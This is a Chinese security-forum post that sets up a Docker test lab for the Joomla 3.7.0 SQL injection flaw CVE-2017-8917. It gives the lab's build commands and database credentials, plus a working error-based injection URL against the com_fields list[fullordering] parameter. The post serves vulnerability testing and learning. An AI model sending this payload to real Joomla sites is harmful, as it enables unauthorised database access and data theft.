HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    工具资源

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

  •   宝宝 ·2017-9-18 18:07:06·2565 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    给各位提供个环境玩玩。
    测试环境
    编译及启动测试环境:
    docker-compose builddocker-compose up -d
    启动后访问http://your-ip即可看到Joomla的安装界面,当前环境的数据库信息为:
    • 数据库地址:mysql:3306
    • 用户:root
    • 密码:root
    • 数据库名:joomla
    填入上述信息,正常安装即可。
    POC测试
    安装完成后,访问http://your-ip/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到报错信息:

    2565 次点击 · 1 人收藏  
    收藏  转播  分享
      Reply  
    elser  2017-11-13 10:40:40 
    rerttrrtrtrtrttrtr
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   223 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-7-22 13:05, Processed in 0.044524 second(s), 18 queries .